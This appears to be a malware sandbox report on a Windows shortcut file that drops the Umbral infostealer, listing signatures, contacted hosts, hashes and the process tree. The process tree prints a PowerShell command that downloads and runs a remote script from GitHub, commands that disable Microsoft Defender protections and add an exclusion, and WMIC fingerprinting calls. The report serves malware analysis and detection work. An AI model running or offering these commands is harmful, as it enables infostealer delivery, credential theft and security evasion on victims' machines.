Analysis
-
max time kernel
32s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
23/03/2025, 14:40
Static task
static1
General
-
Target
1231321312.lnk
-
Size
2KB
-
MD5
a83ed03220cbc79bcbcaae9a57d0b95a
-
SHA1
062d88505a421b491c8614ccff1d8fdd34453e18
-
SHA256
c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033
-
SHA512
97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0009000000024241-19.dat family_umbral behavioral1/memory/1140-26-0x00000264A6A30000-0x00000264A6A70000-memory.dmp family_umbral -
Umbral family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 4072 powershell.exe 13 4072 powershell.exe -
pid Process 1428 powershell.exe 4916 powershell.exe 536 powershell.exe 4072 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1140 Umbral.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 35 discord.com 5 raw.githubusercontent.com 7 raw.githubusercontent.com 34 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 6060 wmic.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4072 powershell.exe 4072 powershell.exe 536 powershell.exe 536 powershell.exe 1428 powershell.exe 1428 powershell.exe 4916 powershell.exe 4916 powershell.exe 4916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 1140 Umbral.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeIncreaseQuotaPrivilege 2764 wmic.exe Token: SeSecurityPrivilege 2764 wmic.exe Token: SeTakeOwnershipPrivilege 2764 wmic.exe Token: SeLoadDriverPrivilege 2764 wmic.exe Token: SeSystemProfilePrivilege 2764 wmic.exe Token: SeSystemtimePrivilege 2764 wmic.exe Token: SeProfSingleProcessPrivilege 2764 wmic.exe Token: SeIncBasePriorityPrivilege 2764 wmic.exe Token: SeCreatePagefilePrivilege 2764 wmic.exe Token: SeBackupPrivilege 2764 wmic.exe Token: SeRestorePrivilege 2764 wmic.exe Token: SeShutdownPrivilege 2764 wmic.exe Token: SeDebugPrivilege 2764 wmic.exe Token: SeSystemEnvironmentPrivilege 2764 wmic.exe Token: SeRemoteShutdownPrivilege 2764 wmic.exe Token: SeUndockPrivilege 2764 wmic.exe Token: SeManageVolumePrivilege 2764 wmic.exe Token: 33 2764 wmic.exe Token: 34 2764 wmic.exe Token: 35 2764 wmic.exe Token: 36 2764 wmic.exe Token: SeIncreaseQuotaPrivilege 2764 wmic.exe Token: SeSecurityPrivilege 2764 wmic.exe Token: SeTakeOwnershipPrivilege 2764 wmic.exe Token: SeLoadDriverPrivilege 2764 wmic.exe Token: SeSystemProfilePrivilege 2764 wmic.exe Token: SeSystemtimePrivilege 2764 wmic.exe Token: SeProfSingleProcessPrivilege 2764 wmic.exe Token: SeIncBasePriorityPrivilege 2764 wmic.exe Token: SeCreatePagefilePrivilege 2764 wmic.exe Token: SeBackupPrivilege 2764 wmic.exe Token: SeRestorePrivilege 2764 wmic.exe Token: SeShutdownPrivilege 2764 wmic.exe Token: SeDebugPrivilege 2764 wmic.exe Token: SeSystemEnvironmentPrivilege 2764 wmic.exe Token: SeRemoteShutdownPrivilege 2764 wmic.exe Token: SeUndockPrivilege 2764 wmic.exe Token: SeManageVolumePrivilege 2764 wmic.exe Token: 33 2764 wmic.exe Token: 34 2764 wmic.exe Token: 35 2764 wmic.exe Token: 36 2764 wmic.exe Token: SeIncreaseQuotaPrivilege 896 wmic.exe Token: SeSecurityPrivilege 896 wmic.exe Token: SeTakeOwnershipPrivilege 896 wmic.exe Token: SeLoadDriverPrivilege 896 wmic.exe Token: SeSystemProfilePrivilege 896 wmic.exe Token: SeSystemtimePrivilege 896 wmic.exe Token: SeProfSingleProcessPrivilege 896 wmic.exe Token: SeIncBasePriorityPrivilege 896 wmic.exe Token: SeCreatePagefilePrivilege 896 wmic.exe Token: SeBackupPrivilege 896 wmic.exe Token: SeRestorePrivilege 896 wmic.exe Token: SeShutdownPrivilege 896 wmic.exe Token: SeDebugPrivilege 896 wmic.exe Token: SeSystemEnvironmentPrivilege 896 wmic.exe Token: SeRemoteShutdownPrivilege 896 wmic.exe Token: SeUndockPrivilege 896 wmic.exe Token: SeManageVolumePrivilege 896 wmic.exe Token: 33 896 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 868 wrote to memory of 4072 868 cmd.exe 87 PID 868 wrote to memory of 4072 868 cmd.exe 87 PID 4072 wrote to memory of 1140 4072 powershell.exe 91 PID 4072 wrote to memory of 1140 4072 powershell.exe 91 PID 1140 wrote to memory of 536 1140 Umbral.exe 93 PID 1140 wrote to memory of 536 1140 Umbral.exe 93 PID 1140 wrote to memory of 1428 1140 Umbral.exe 96 PID 1140 wrote to memory of 1428 1140 Umbral.exe 96 PID 1140 wrote to memory of 2764 1140 Umbral.exe 100 PID 1140 wrote to memory of 2764 1140 Umbral.exe 100 PID 1140 wrote to memory of 896 1140 Umbral.exe 102 PID 1140 wrote to memory of 896 1140 Umbral.exe 102 PID 1140 wrote to memory of 2740 1140 Umbral.exe 104 PID 1140 wrote to memory of 2740 1140 Umbral.exe 104 PID 1140 wrote to memory of 4916 1140 Umbral.exe 106 PID 1140 wrote to memory of 4916 1140 Umbral.exe 106 PID 1140 wrote to memory of 6060 1140 Umbral.exe 108 PID 1140 wrote to memory of 6060 1140 Umbral.exe 108
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4916
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:6060
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5b19913357989f970be504865ba652cca
SHA1cae60927136a52ea75f6ab621494fc4251c9f215
SHA2561a12d18378c1ee54857475e7685beea587c8b0f97bce15037064e98f9517864e
SHA5129dd210ad35a60abb11127cb73ada17b1b506c892f083674b0e5057d6ed179e02729e8742ef0433040890f9c5c523e0a315620f9fa035556fbc5515b65162c5ba
-
Filesize
944B
MD5fe32430ab97c0308ed326ed9a7dd94d1
SHA17f10913ddfec7fd269da79de83156cd07623410a
SHA25674ce5bee24a7c0a66983eea9391cb607f1d15d2c30a633a259b9517804ebe7a0
SHA512a38c58cca3c40cea8995f3fa50d32035366d1d990ce264557af1a3cad2eb39023433f9ac362f2ae67d25ce1a8bd76d1cb2444d3a2fc1d24df465490bbcb6c839
-
Filesize
948B
MD574a6b79d36b4aae8b027a218bc6e1af7
SHA10350e46c1df6934903c4820a00b0bc4721779e5f
SHA25660c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04
SHA51260e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0
-
Filesize
227KB
MD568b35208a6ccc5cf6cfa41f86712e7ab
SHA134c735c3cc8fd7f9d225cd7323e5632aa772f465
SHA2564a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279
SHA512f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82